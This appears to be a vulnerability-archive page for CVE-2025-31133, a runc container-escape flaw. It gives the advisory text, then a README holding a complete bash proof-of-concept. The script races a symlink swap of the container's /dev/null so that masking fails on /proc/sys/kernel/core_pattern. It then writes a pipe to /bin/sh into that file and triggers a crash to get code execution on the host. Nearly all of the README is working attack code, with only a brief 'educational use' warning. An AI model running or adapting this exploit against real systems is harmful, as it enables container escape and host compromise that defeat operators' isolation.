Associated Vulnerability
Title:runc container escape via "masked path" abuse due to mount race conditions (CVE-2025-31133)Description:runc is a CLI tool for spawning and running containers according to the OCI specification. In versions 1.2.7 and below, 1.3.0-rc.1 through 1.3.1, 1.4.0-rc.1 and 1.4.0-rc.2 files, runc would not perform sufficient verification that the source of the bind-mount (i.e., the container's /dev/null) was actually a real /dev/null inode when using the container's /dev/null to mask. This exposes two methods of attack: an arbitrary mount gadget, leading to host information disclosure, host denial of service, container escape, or a bypassing of maskedPaths. This issue is fixed in versions 1.2.8, 1.3.3 and 1.4.0-rc.3.
Readme
## CVE-2025-31133 runc maskedPaths Exploit PoC
> **WARNING:**
> This PoC attempts host code execution via runc maskedPaths race.
> For educational and authorized lab use only.
```bash
#!/bin/bash
# CVE-2025-31133 runc maskedPaths symlink race exploit
# This PoC performs a real breakout: writes core_pattern to invoke /bin/sh on the host.
# WARNING: This WILL attempt host code execution. Use only in isolated, disposable labs you fully control.
set -euo pipefail
RUNC_BIN="/usr/local/bin/runc"
CONTAINER_ROOTFS="./rootfs"
CONTAINER_NAME="cve31133poc"
echo "[*] runc version: $($RUNC_BIN --version | head -1)"
echo "[*] Make sure this is a known vulnerable runc version (CVE-2025-31133)."
# Fresh rootfs with static /dev
rm -rf "$CONTAINER_ROOTFS"
mkdir -p "$CONTAINER_ROOTFS"/{proc,dev,sys,bin,tmp}
cp /bin/busybox "$CONTAINER_ROOTFS/bin/sh"
chmod +x "$CONTAINER_ROOTFS/bin/sh"
mknod "$CONTAINER_ROOTFS/dev/null" c 1 3
cat > config.json <<EOF
{
"ociVersion": "1.0.2",
"process": {
"terminal": false,
"user": { "uid": 0, "gid": 0 },
"args": ["/bin/sh", "-c", "sleep 30"],
"env": ["PATH=/bin"],
"cwd": "/"
},
"root": { "path": "rootfs", "readonly": false },
"mounts": [
{ "destination": "/proc", "type": "proc", "source": "proc" },
{ "destination": "/dev", "type": "bind", "source": "dev", "options": ["rbind", "rw"] },
{ "destination": "/sys", "type": "sysfs", "source": "sysfs" }
],
"linux": {
"namespaces": [
{ "type": "pid" },
{ "type": "network" },
{ "type": "mount" },
{ "type": "ipc" },
{ "type": "uts" }
],
"maskedPaths": [
"/proc/kcore",
"/proc/latency_stats",
"/proc/timer_list",
"/proc/sched_debug",
"/sys/firmware",
"/proc/sys/kernel/core_pattern"
]
}
}
EOF
echo "[*] config.json created (explicit maskedPaths)."
# Start the symlink race BEFORE and DURING runc run
symlink_race() {
local end=$((SECONDS+20))
while [ $SECONDS -lt $end ]; do
rm -f "$CONTAINER_ROOTFS/dev/null"
ln -s /proc/sys/kernel/core_pattern "$CONTAINER_ROOTFS/dev/null"
sleep 0.01 2>/dev/null || sleep 1
rm -f "$CONTAINER_ROOTFS/dev/null"
mknod "$CONTAINER_ROOTFS/dev/null" c 1 3
sleep 0.01 2>/dev/null || sleep 1
done
}
echo "[*] Starting symlink race background process."
symlink_race &
RACE_PID=$!
# Start container while race is active
echo "[*] Launching runc run..."
$RUNC_BIN run --detach --bundle . "$CONTAINER_NAME"
sleep 2
echo "[*] Writing to /proc/sys/kernel/core_pattern in container (real exploit)."
$RUNC_BIN exec "$CONTAINER_NAME" /bin/sh -c 'echo "|/bin/sh -i" > /proc/sys/kernel/core_pattern; kill -ABRT $$'
wait $RACE_PID || true
$RUNC_BIN kill "$CONTAINER_NAME" || true
$RUNC_BIN delete "$CONTAINER_NAME" || true
echo "[+] Exploit attempt complete. If successful, you should now have code exec on the host via core_pattern!"
File Snapshot
[4.0K] /data/pocs/1b1f165959d96e5263509c79a12713c0f824af9e
└── [2.8K] README.md
1 directory, 1 file
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →